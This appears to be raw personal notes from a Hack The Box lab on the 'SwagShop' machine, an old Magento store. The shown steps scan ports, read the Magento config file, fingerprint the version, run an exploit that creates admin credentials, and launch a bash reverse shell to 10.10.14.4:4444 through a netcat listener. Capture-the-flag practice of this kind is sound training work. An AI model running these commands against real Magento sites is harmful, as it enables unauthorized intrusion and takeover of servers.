master
Raw Download raw file 
 12025-04-04T08:07:59-04:00
 2
 3sudo apt install -y nmap curl python3-venv make zip unzip
 4sudo openvpn --config htb.ovpn
 5
 6### T1 10.129.232.93
 7
 8ping -c 1 10.129.232.93
 9nmap -sV -T4 10.129.232.93
10
11PORT   STATE SERVICE VERSION
1222/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
1380/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
14
15up, ports open
16
1710.129.232.93 swagshop.htb
18
19curl -L http://swagshop.htb/app/etc/local.xml
20
21magneto software
2210.129.232.93 swagshop.htb
23
24
25curl -L -O https://github.com/steverobbins/magescan/releases/download/v1.12.9/magescan.phar
26 
27  Magento Information
28+-----------+------------------+
29| Parameter | Value            |
30+-----------+------------------+
31| Edition   | Community        |
32| Version   | 1.9.0.0, 1.9.0.1 |
33+-----------+------------------+
34
352025-04-04T08:28:28-04:00 WORKED
36Check http://swagshop.htb/admin with creds ypwq:123
37masq succes
38
39
402025-04-04T08:39:33-04:00
41nc -l -p 4444
42python3 exp.py http://swagshop.htb/index.php/admin /bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.4/4444 0>&1'
43success
44
45running find
46exit